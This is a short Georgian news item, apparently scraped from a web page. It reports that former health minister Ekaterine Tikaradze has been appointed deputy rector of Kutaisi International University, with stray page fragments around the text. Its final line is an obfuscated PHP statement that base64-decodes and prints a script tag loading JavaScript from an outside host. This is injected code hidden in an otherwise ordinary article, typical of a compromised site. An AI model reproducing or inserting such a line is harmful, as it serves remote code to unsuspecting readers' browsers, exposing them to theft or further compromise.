celsiusi
ავერსი საქკაბელი
ჯანდაცვის ყოფილი მინისტრი, ეკატერინე ტიკარაძე ქუთაისის საერთაშორისო უნივერსიტეტის რექტორის მოადგილედ დაინიშნა. ამის შესახებ ინფორმაციას უნივერსიტეტი ავრცელებს.
 
"უნივერსიტეტის სამედიცინო მიმართულების პროექტებს ჩაიბარებს, კერძოდ, უხელმძღვანელებს ადრონული თერაპიის ცენტრის კლინიკურ ნაწილს, სასწავლო ჰოსპიტლისა და მედიცინის სკოლის პროექტებს, რომელიც უნივერსიტეტში განხორციელდება", - აღნიშნავენ სასწავლებელში.
 
ქუთაისის საერთაშორისო უნივერსიტეტი ქართული ოცნების დამფუძნებლის, ბიძინა ივანიშვილის დაფინანსებით შეიქმნა. 
 
ტიკარაძე ჯანდაცვის მინისტრი 2019-2021 წლებში იყო. ეკატერინე ტიკარაძემ თანამდებობიდან გადადგომის შესახებ განცხადება 9 დეკემბერს, ქართული ოცნების ოფისში, ბრიფინგზე გააკეთა. მანამდე ვრცელდებოდა ინფორმაცია, რომ მასსა და პრემიერმინისტრ, ირაკლი ღარიბაშვილს შორის პანდემიის მართვასთან დაკავშირებით აზრთა სხვადასხვაობა და უთანხმოება ჰქონდათ.
1057
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");